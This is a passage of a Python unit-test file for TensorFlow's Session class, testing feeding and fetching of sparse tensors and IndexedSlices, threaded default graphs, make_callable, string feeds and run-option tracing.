with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = array_ops.sparse_placeholder(
shape=[None, 9, 2], dtype=np.float32, name='placeholder1')
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.dense_shape)
sp2 = sparse_tensor.SparseTensor(sp_indices, sp_values, sp_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: (indices, values, shape)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue, fetch SparseTensorValue
sp2_out = s.run(sp2, {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(sp2_out.indices, indices)
self.assertAllEqual(sp2_out.values, values)
self.assertAllEqual(sp2_out.dense_shape, shape)
def testFeedSparsePlaceholderConstantShape(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = array_ops.sparse_placeholder(
dtype=np.float32, shape=shape, name='placeholder1')
self.assertAllEqual(sp.dense_shape.eval(session=s), shape)
self.assertAllEqual(tensor_util.constant_value(sp.dense_shape), shape)
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.dense_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: (indices, values)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
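# IndexedSlices follows the same fetch/feed pattern via IndexedSlicesValue,
# whose field order is (values, indices, dense_shape) -- note this differs
# from SparseTensorValue -- and whose dense_shape may be None.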
def testFetchIndexedSlices(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
dense_shape = np.array([7, 9, 2]).astype(np.int64)
ind = ops.IndexedSlices(
constant_op.constant(values), constant_op.constant(indices),
constant_op.constant(dense_shape))
# Single fetch, use as tuple
ind_out = s.run(ind)
values_out, indices_out, dense_shape_out = ind_out
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Single fetch, use as IndexedSlicesValue
ind_out = s.run(ind)
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
# Tuple fetch, use as tuple
values_out, indices_out, dense_shape_out = s.run(ind)
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as tuple
(values_out, indices_out, dense_shape_out), = s.run([ind])
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as IndexedSlicesValue
ind_out, = s.run([ind])
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
def testFeedIndexedSlices(self):
with session.Session() as s:
values = np.array([1.0, 2.0]).astype(np.float32)
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
dense_shape = np.array([7, 9, 2]).astype(np.int64)
ind = ops.IndexedSlices(
array_ops.placeholder(dtype=np.float32, shape=(2,)),
array_ops.placeholder(dtype=np.int64, shape=(2, 3)),
array_ops.placeholder(dtype=np.int64, shape=(3,)),
)
ind_values = array_ops.identity(ind.values)
ind_indices = array_ops.identity(ind.indices)
ind_dense_shape = array_ops.identity(ind.dense_shape)
ind2 = ops.IndexedSlices(ind_values, ind_indices, ind_dense_shape)
# Feed with tuple
values_out, indices_out, dense_shape_out = s.run(
[ind_values, ind_indices, ind_dense_shape], {
ind: (values, indices, dense_shape)
})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Feed with IndexedSlicesValue
values_out, indices_out, dense_shape_out = s.run(
[ind_values, ind_indices, ind_dense_shape], {
ind: ops.IndexedSlicesValue(values, indices, dense_shape)
})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Feed with IndexedSlicesValue, fetch IndexedSlicesValue
ind2_out = s.run(ind2, {
ind: ops.IndexedSlicesValue(values, indices, dense_shape)
})
self.assertAllEqual(ind2_out.values, values)
self.assertAllEqual(ind2_out.indices, indices)
self.assertAllEqual(ind2_out.dense_shape, dense_shape)
def testFetchIndexedSlicesWithoutDenseShape(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
dense_shape = None
ind = ops.IndexedSlices(
constant_op.constant(values), constant_op.constant(indices), None)
# Single fetch, use as tuple
ind_out = s.run(ind)
values_out, indices_out, dense_shape_out = ind_out
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Single fetch, use as IndexedSlicesValue
ind_out = s.run(ind)
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
# Tuple fetch, use as tuple
values_out, indices_out, dense_shape_out = s.run(ind)
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as tuple
(values_out, indices_out, dense_shape_out), = s.run([ind])
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as IndexedSlicesValue
ind_out, = s.run([ind])
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
def testFeedIndexedSlicesWithoutDenseShape(self):
with session.Session() as s:
values = np.array([1.0, 2.0]).astype(np.float32)
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
dense_shape = None
ind = ops.IndexedSlices(
array_ops.placeholder(dtype=np.float32, shape=(2,)),
array_ops.placeholder(dtype=np.int64, shape=(2, 3)), None)
ind_values = array_ops.identity(ind.values)
ind_indices = array_ops.identity(ind.indices)
ind2 = ops.IndexedSlices(ind_values, ind_indices)
# Feed with tuple
values_out, indices_out = s.run([ind_values, ind_indices], {
ind: (values, indices)
})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
# Feed with IndexedSlicesValue
values_out, indices_out = s.run([ind_values, ind_indices], {
ind: ops.IndexedSlicesValue(values, indices, dense_shape)
})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
# Feed with IndexedSlicesValue, fetch IndexedSlicesValue
ind2_out = s.run(ind2, {
ind: ops.IndexedSlicesValue(values, indices, dense_shape)
})
self.assertAllEqual(ind2_out.values, values)
self.assertAllEqual(ind2_out.indices, indices)
self.assertAllEqual(ind2_out.dense_shape, dense_shape)
def testExtendWithStatelessOperations(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
c_val = s.run(c)
self.assertAllEqual([[4.0, 4.0, 4.0]], c_val)
d = constant_op.constant([1.0, 2.0, 3.0], shape=[3, 1])
e = math_ops.matmul(c, d)
# Extend will happen here.
e_val = s.run(e)
self.assertAllEqual([[24.0]], e_val)
def testExtendWithStatefulOperations(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='testExtendWithStatefulOperations_v')
v.initializer.run()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
# Extend will happen here.
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
def testExtendWithGroupBy(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
p = variables.Variable(a, name='testExtendWithGroupBy_p')
a_val = a.eval() # Force an Extend after this op.
self.assertAllEqual([[1.0, 1.0]], a_val)
b = constant_op.constant(2.0, shape=[1, 2])
q = variables.Variable(b, name='testExtendWithGroupBy_q')
# Extend will happen here.
init = control_flow_ops.group(p.initializer, q.initializer)
s.run(init)
p_val, q_val = s.run([p, q])
self.assertAllEqual([[1.0, 1.0]], p_val)
self.assertAllEqual([[2.0, 2.0]], q_val)
def testTensorGetMethod(self):
with session.Session():
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
c_val = c.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], c_val)
fed_c_val = c.eval(feed_dict={a.name: [[4.0, 4.0]]})
self.assertAllEqual([[16.0, 16.0, 16.0]], fed_c_val)
def testOperationRunMethod(self):
with session.Session():
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[1, 2], name='b')
v = variables.Variable(a, a.dtype)
assign_a_to_v = state_ops.assign(v, a)
assign_a_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[1.0, 1.0]], v_val)
assign_b_to_v = state_ops.assign(v, b)
assign_b_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[2.0, 2.0]], v_val)
assign_b_to_v.eval(feed_dict={'b:0': [[3.0, 3.0]]})
v_val = v.eval()
self.assertAllEqual([[3.0, 3.0]], v_val)
def testDefaultGraph(self):
with session.Session() as s:
self.assertEqual(ops.get_default_graph(), s.graph)
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
self.assertEqual(ops.get_default_graph(), a.graph)
self.assertEqual(ops.get_default_graph(), b.graph)
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='testDefaultGraph_v')
v.initializer.run()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
self.assertEqual(ops.get_default_graph(), s.graph)
def _testDefaultGraphInThread(self, constructed_event, continue_event, i):
with session.Session() as s:
self.assertEqual(ops.get_default_graph(), s.graph)
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='var_%d' % i)
# Block here until all threads have constructed their graph.
constructed_event.set()
continue_event.wait()
assign_c_to_v = state_ops.assign(v, c)
v.initializer.run()
assign_c_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
self.assertEqual(ops.get_default_graph(), s.graph)
def testDefaultGraphWithThreads(self):
# Fork ten threads that use their thread-local default graph.
threads = []
constructed_events = [threading.Event() for _ in range(10)]
continue_event = threading.Event()
for i, constructed_event in enumerate(constructed_events):
t = self.checkedThread(
target=self._testDefaultGraphInThread,
args=(constructed_event, continue_event, i))
threads.append(t)
for t in threads:
t.start()
for constructed_event in constructed_events:
constructed_event.wait()
continue_event.set()
for t in threads:
t.join()
def testParallelRun(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
ev = threading.Event()
def run_step():
ev.wait()
val = c.eval(session=sess)
self.assertEqual(val, 5.0)
threads = [self.checkedThread(target=run_step) for _ in range(100)]
for t in threads:
t.start()
ev.set()
for t in threads:
t.join()
def testRunFeedDict(self):
with session.Session() as s:
x = array_ops.zeros([2])
y = s.run(2 * x, feed_dict={x: np.ones(2).astype(np.float32)})
self.assertAllEqual(y, 2 * np.ones(2))
y = s.run(2 * x, feed_dict={x.name: np.ones(2).astype(np.float32)})
self.assertAllEqual(y, 2 * np.ones(2))
y = s.run(2 * x, feed_dict={x: [1, 1]})
assert (y == 2 * np.ones(2)).all()
# Test nested tuple keys
z = (((array_ops.zeros([2]),),), array_ops.zeros([2]),
(array_ops.zeros([2]),))
result = [z[0][0][0] * 2, z[1] * 2, z[2][0] * 2]
values = (((np.array([1, 1]),),), np.array([2, 2]), (np.array([3, 3]),))
result_value = s.run(result, feed_dict={z: values})
self.assertAllEqual(result_value[0], 2 * np.ones(2))
self.assertAllEqual(result_value[1], 2 * np.array([2, 2]))
self.assertAllEqual(result_value[2], 2 * np.array([3, 3]))
def testGraphDef(self):
with session.Session() as sess:
self.assertProtoEquals('versions { producer: %d min_consumer: %d }' %
(versions.GRAPH_DEF_VERSION,
versions.GRAPH_DEF_VERSION_MIN_CONSUMER),
sess.graph_def)
c = constant_op.constant(5.0, name='c')
self.assertEquals(len(sess.graph_def.node), 1)
d = constant_op.constant(6.0, name='d')
self.assertEquals(len(sess.graph_def.node), 2)
self.assertAllEqual(c.eval(), 5.0)
self.assertAllEqual(d.eval(), 6.0)
e = constant_op.constant(7.0, name='e')
self.assertEquals(len(sess.graph_def.node), 3)
self.assertAllEqual(e.eval(), 7.0)
def testUseAfterClose(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
self.assertAllEqual(sess.run(c), 5.0)
with self.assertRaisesWithPredicateMatch(
RuntimeError, lambda e: 'Attempted to use a closed Session.' in str(e)):
sess.run(c)
def testUseAfterCloseConcurrent(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
self.assertAllEqual(sess.run(c), 5.0)
def update_thread():
with self.assertRaisesWithPredicateMatch(
RuntimeError,
lambda e: 'Attempted to use a closed Session.' in str(e)):
while True:
sess.run(c)
t = threading.Thread(target=update_thread)
t.start()
time.sleep(0.1)
sess.close()
t.join()
def testUseEmptyGraph(self):
with session.Session() as sess:
with self.assertRaisesRegexp(RuntimeError, 'The Session graph is empty.'):
sess.run([])
with self.assertRaisesRegexp(RuntimeError, 'The Session graph is empty.'):
sess.run(())
with self.assertRaisesRegexp(RuntimeError, 'The Session graph is empty.'):
sess.run({})
def testNotEntered(self):
# pylint: disable=protected-access
self.assertEqual(ops._default_session_stack.get_default(), None)
# pylint: enable=protected-access
with ops.device('/cpu:0'):
sess = session.Session()
c_1 = constant_op.constant(5.0)
with sess.graph.as_default():
c_2 = constant_op.constant(5.0)
self.assertEqual(c_1.graph, c_2.graph)
self.assertEqual(sess.run(c_2), 5.0)
with self.assertRaisesWithPredicateMatch(
ValueError, lambda e: 'No default session is registered.' in str(e)):
c_2.eval()
def testInteractive(self):
with ops.device('/cpu:0'):
sess = session.InteractiveSession()
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
self.assertAllEqual([[4.0, 4.0, 4.0]], c.eval())
d = constant_op.constant([1.0, 2.0, 3.0], shape=[3, 1])
e = math_ops.matmul(c, d)
self.assertAllEqual([[24.0]], e.eval())
sess.close()
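# The next two tests contrast graph placement: an InteractiveSession only
# places the pruned subgraph needed for each run, so an op with no valid
# kernel is harmless until it is actually fetched, whereas a plain Session
# places the whole graph and fails on the first run even for valid fetches.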
def testInteractivePlacePrunedGraph(self):
sess = session.InteractiveSession()
# Build a graph that has a bad op in it (no kernel).
#
# This test currently does not link in any GPU kernels,
# which is why placing this is invalid. If at some point
# GPU kernels are added to this test, some other different
# op / device combo should be chosen.
with ops.device('/device:GPU:0'):
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(1.0, shape=[1, 2])
# Only run the valid op, this should work.
b.eval()
with self.assertRaises(errors.InvalidArgumentError):
a.eval()
sess.close()
def testDefaultSessionPlacePrunedGraph(self):
sess = session.Session()
# Build a graph that has a bad op in it (no kernel).
#
# This test currently does not link in any GPU kernels,
# which is why placing this is invalid. If at some point
# GPU kernels are added to this test, some other different
# op / device combo should be chosen.
with ops.device('/device:GPU:0'):
_ = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(1.0, shape=[1, 2])
with self.assertRaises(errors.InvalidArgumentError):
# Even though we don't run the bad op, we place the entire
# graph, which should fail with a non-interactive session.
sess.run(b)
sess.close()
def testSharedGraph(self):
with ops.Graph().as_default() as g, ops.device('/cpu:0'):
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
with session.Session(graph=g) as sess1:
with session.Session(graph=g) as sess2:
self.assertAllEqual(sess1.run(c), sess2.run(c))
def testDuplicatedInputs(self):
with session.Session() as sess:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[1, 3])
a_val, b_val, a2_val = sess.run([a, b, a])
self.assertAllEqual(a_val, [[1.0, 1.0]])
self.assertAllEqual(b_val, [[2.0, 2.0, 2.0]])
self.assertAllEqual(a2_val, [[1.0, 1.0]])
def testFeedAndFetch(self):
with session.Session() as sess:
for dtype in [
dtypes.float16, dtypes.float32, dtypes.float64, dtypes.int32,
dtypes.uint8, dtypes.int16, dtypes.int8, dtypes.int64, dtypes.bool,
dtypes.complex64, dtypes.complex128
]:
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
np_dtype = dtype.as_numpy_dtype
feed_t = array_ops.placeholder(dtype=dtype, shape=shape)
out_t = array_ops.identity(feed_t)
np_array = np.random.randint(-10, 10, shape)
if dtype == dtypes.bool:
np_array = np_array > 0
elif dtype == dtypes.complex64:
np_array = np.sqrt(np_array.astype(np_dtype))
elif dtype == dtypes.complex128:
np_array = np.sqrt(np_array.astype(np_dtype))
else:
np_array = np_array.astype(np_dtype)
self.assertAllEqual(np_array,
sess.run(out_t, feed_dict={
feed_t: np_array
}))
# Check that we can also get the feed back.
self.assertAllEqual(np_array,
sess.run(feed_t, feed_dict={
feed_t: np_array
}))
# Also check that we can get both back.
out_v, feed_v = sess.run(
[out_t, feed_t], feed_dict={
feed_t: np_array
})
self.assertAllEqual(np_array, out_v)
self.assertAllEqual(np_array, feed_v)
feed_fetch_runner = sess.make_callable([out_t, feed_t], [feed_t])
out_v, feed_v = feed_fetch_runner(np_array)
self.assertAllEqual(np_array, out_v)
self.assertAllEqual(np_array, feed_v)
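# make_callable(fetches, feed_list=...) returns a Python callable bound to
# this session; with accept_options=True the callable additionally accepts
# options= and run_metadata= keyword arguments, e.g.
#   runner = sess.make_callable(a, accept_options=True)
#   res = runner(options=run_options, run_metadata=run_metadata)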
def testMakeCallableOnTensorWithRunOptions(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
tensor_runner = sess.make_callable(a, accept_options=True)
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
self.assertEqual(0, len(run_metadata.step_stats.dev_stats))
res = tensor_runner(options=run_options, run_metadata=run_metadata)
self.assertEqual(42.0, res)
self.assertGreater(len(run_metadata.step_stats.dev_stats), 0)
def testMakeCallableOnOperationWithRunOptions(self):
with session.Session() as sess:
a = variables.Variable(42.0)
b = state_ops.assign_add(a, 1.0)
sess.run(a.initializer)
tensor_runner = sess.make_callable(b.op, accept_options=True)
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
self.assertEqual(0, len(run_metadata.step_stats.dev_stats))
tensor_runner(options=run_options, run_metadata=run_metadata)
self.assertEqual(43.0, sess.run(a))
self.assertGreater(len(run_metadata.step_stats.dev_stats), 0)
def testMakeCallableWithFeedListAndRunOptions(self):
with session.Session() as sess:
ph = array_ops.placeholder(dtypes.float32)
a = math_ops.add(ph, 1.0)
tensor_runner = sess.make_callable(
a, feed_list=[ph.name], accept_options=True)
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
self.assertEqual(0, len(run_metadata.step_stats.dev_stats))
self.assertAllClose(42.0,
tensor_runner(
41.0,
options=run_options,
run_metadata=run_metadata))
self.assertGreater(len(run_metadata.step_stats.dev_stats), 0)
def testFeedError(self):
with session.Session() as sess:
feed_t = array_ops.placeholder(dtype=dtypes.float32)
out_t = array_ops.identity(feed_t)
feed_val = constant_op.constant(5.0)
with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
sess.run(out_t, feed_dict={feed_t: feed_val})
with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
out_t.eval(feed_dict={feed_t: feed_val})
with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
out_t.op.run(feed_dict={feed_t: feed_val})
def testFeedPrecisionLossError(self):
with session.Session() as sess:
largest_int64 = np.iinfo(np.int64).max
feed_int_implicit_int32 = constant_op.constant(1)
feed_int_explicit_int32 = constant_op.constant(1, dtype=dtypes.int32)
out_t = constant_op.constant(1.0)
with self.assertRaisesRegexp(TypeError,
'is not compatible with Tensor type'):
sess.run(out_t, feed_dict={feed_int_implicit_int32: largest_int64})
with self.assertRaisesRegexp(TypeError,
'is not compatible with Tensor type'):
sess.run(out_t, feed_dict={feed_int_explicit_int32: largest_int64})
def testStringFetch(self):
with session.Session():
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
size = 1
for s in shape:
size *= s
c_list = np.array(
[compat.as_bytes(str(i)) for i in xrange(size)],
dtype=np.object).reshape(shape) if size > 0 else []
c = constant_op.constant(c_list)
self.assertAllEqual(c.eval(), c_list)
def testStringFeed(self):
with session.Session() as sess:
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
size = 1
for s in shape:
size *= s
c_list = np.array(
[compat.as_bytes(str(i)) for i in xrange(size)],
dtype=np.object).reshape(shape)
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=shape)
c = array_ops.identity(feed_t)
self.assertAllEqual(sess.run(c, feed_dict={feed_t: c_list}), c_list)
self.assertAllEqual(
sess.run(feed_t, feed_dict={
feed_t: c_list
}), c_list)
c_v, feed_v = sess.run([c, feed_t], feed_dict={feed_t: c_list})
self.assertAllEqual(c_v, c_list)
self.assertAllEqual(feed_v, c_list)
def testStringFeedWithNullCharacters(self):
with session.Session():
c_list = [b'\n\x01\x00', b'\n\x00\x01']
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=[2])
c = array_ops.identity(feed_t)
out = c.eval(feed_dict={feed_t: c_list})
self.assertEqual(c_list[0], out[0])
self.assertEqual(c_list[1], out[1])
def testStringFeedWithUnicode(self):
with session.Session():
c_list = [
u'\n\x01\x00', u'\n\x00\x01', u'\u26a3 unicode',
u'\U0001f60e deal with it'
]
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=[len(c_list)])
c = array_ops.identity(feed_t)
out = c.eval(feed_dict={feed_t: c_list})
for i in range(len(c_list)):
self.assertEqual(c_list[i], out[i].decode('utf-8'))
out = c.eval(feed_dict={feed_t: np.array(c_list, dtype=np.object)})
for i in range(len(c_list)):
self.assertEqual(c_list[i], out[i].decode('utf-8'))
def testInvalidTargetFails(self):
with self.assertRaisesRegexp(
errors.NotFoundError,
'No session factory registered for the given session options'):
session.Session('INVALID_TARGET')
def testFetchByNameDifferentStringTypes(self):
with session.Session() as sess:
c = constant_op.constant(42.0, name='c')
d = constant_op.constant(43.0, name=u'd')
e = constant_op.constant(44.0, name=b'e')
f = constant_op.constant(45.0, name=r'f')
self.assertTrue(isinstance(c.name, six.text_type))
self.assertTrue(isinstance(d.name, six.text_type))
self.assertTrue(isinstance(e.name, six.text_type))
self.assertTrue(isinstance(f.name, six.text_type))
self.assertEqual(42.0, sess.run('c:0'))
self.assertEqual(42.0, sess.run(u'c:0'))
self.assertEqual(42.0, sess.run(b'c:0'))
self.assertEqual(42.0, sess.run(r'c:0'))
self.assertEqual(43.0, sess.run('d:0'))
self.assertEqual(43.0, sess.run(u'd:0'))
self.assertEqual(43.0, sess.run(b'd:0'))
self.assertEqual(43.0, sess.run(r'd:0'))
self.assertEqual(44.0, sess.run('e:0'))
self.assertEqual(44.0, sess.run(u'e:0'))
self.assertEqual(44.0, sess.run(b'e:0'))
self.assertEqual(44.0, sess.run(r'e:0'))
self.assertEqual(45.0, sess.run('f:0'))
self.assertEqual(45.0, sess.run(u'f:0'))
self.assertEqual(45.0, sess.run(b'f:0'))
self.assertEqual(45.0, sess.run(r'f:0'))
def testIncorrectGraph(self):
with ops.Graph().as_default() as g_1:
c_1 = constant_op.constant(1.0, name='c')
with ops.Graph().as_default() as g_2:
c_2 = constant_op.constant(2.0, name='c')
self.assertEqual('c', c_1.op.name)
self.assertEqual('c', c_2.op.name)
with session.Session(graph=g_1) as sess_1:
self.assertEqual(1.0, sess_1.run(c_1))
with self.assertRaises(ValueError):
sess_1.run(c_2)
with self.assertRaises(ValueError):
sess_1.run(c_2.op)
with session.Session(graph=g_2) as sess_2:
with self.assertRaises(ValueError):
sess_2.run(c_1)
with self.assertRaises(ValueError):
sess_2.run(c_1.op)
self.assertEqual(2.0, sess_2.run(c_2))
def testFeedDictKeyException(self):
with session.Session() as sess:
a = constant_op.constant(1.0, dtypes.float32, name='a')
with self.assertRaisesRegexp(TypeError, 'Cannot interpret feed_dict'):
sess.run(a, feed_dict={'a': [2.0]})
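# Per-step tracing is opt-in: run_metadata.step_stats is only populated when a
# RunOptions with trace_level=FULL_TRACE is passed together with the
# RunMetadata, e.g.
#   sess.run(fetch, options=run_options, run_metadata=run_metadata)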
def testPerStepTrace(self):
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
with ops.device('/cpu:0'):
with session.Session() as sess:
sess.run(constant_op.constant(1.0))
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(constant_op.constant(1.0), run_metadata=run_metadata)
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(
constant_op.constant(1.0),
options=run_options,
run_metadata=run_metadata)
self.assertTrue(run_metadata.HasField('step_stats'))
self.assertEquals(len(run_metadata.step_stats.dev_stats), 1)
def testRunOptionsRunMetadata(self):
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
with ops.device('/cpu:0'):
with session.Session() as sess:
# all combinations are valid
sess.run(constant_op.constant(1.0), options=None, run_metadata=None)
sess.run(
constant_op.constant(1.0), options=None, run_metadata=run_metadata)
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(
constant_op.constant(1.0), options=run_options, run_metadata=None)
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(
constant_op.constant(1.0),
options=run_options,
run_metadata=run_metadata)
self.assertTrue(run_metadata.HasField('step_stats'))
self.assertEquals(len(run_metadata.step_stats.dev_stats), 1)
def testFeedShapeCompatibility(self):
# TODO(nolivia): C API doesn't yet handle marking nodes as not feedable.
if ops._USE_C_API:
return
with session.Session() as sess:
some_tensor = constant_op.constant([2.0, 2.0, 2.0, 2.0])
new_shape = constant_op.constant([2, 2])
reshaped_tensor = array_ops.reshape(some_tensor, new_shape)
with self.assertRaisesRegexp(ValueError, 'Cannot feed value of shape'):
sess.run(reshaped_tensor, feed_dict={some_tensor: [1.0, 2.0, 3.0]})
with self.assertRaisesRegexp(ValueError, 'may not be fed'):
sess.run(reshaped_tensor, feed_dict={new_shape: [3, 7]})
def testInferShapesFalse(self):
with ops.Graph().as_default(), ops.device('/cpu:0'):
a = constant_op.constant([[1, 2]])
sess = session.Session()
self.assertFalse('_output_shapes' in sess.graph_def.node[0].attr)
# Avoid lint error regarding 'unused' var a.
self.assertTrue(a == a)
def testInferShapesTrue(self):
config = config_pb2.ConfigProto(
graph_options=config_pb2.GraphOptions(infer_shapes=True))
with ops.Graph().as_default(), ops.device('/cpu:0'):
a = constant_op.constant([[1, 2]])
sess = session.Session(config=config)
self.assertTrue('_output_shapes' in sess.graph_def.node[0].attr)
# Avoid lint error regarding 'unused' var a.
self.assertTrue(a == a)
def testBuildCostModel(self):
run_options = config_pb2.RunOptions()
config = config_pb2.ConfigProto(
allow_soft_placement=True,
graph_options=config_pb2.GraphOptions(build_cost_model=100))
with session.Session(config=config) as sess:
with ops.device('/device:GPU:0'):
a = array_ops.placeholder(dtypes.float32, shape=[])
b = math_ops.add(a, a)
c = array_ops.identity(b)
d = math_ops.multiply(c, c)
for step in xrange(120):
run_metadata = config_pb2.RunMetadata()
sess.run(
d,
feed_dict={a: 1.0},
options=run_options,
run_metadata=run_metadata)
if step == 99:
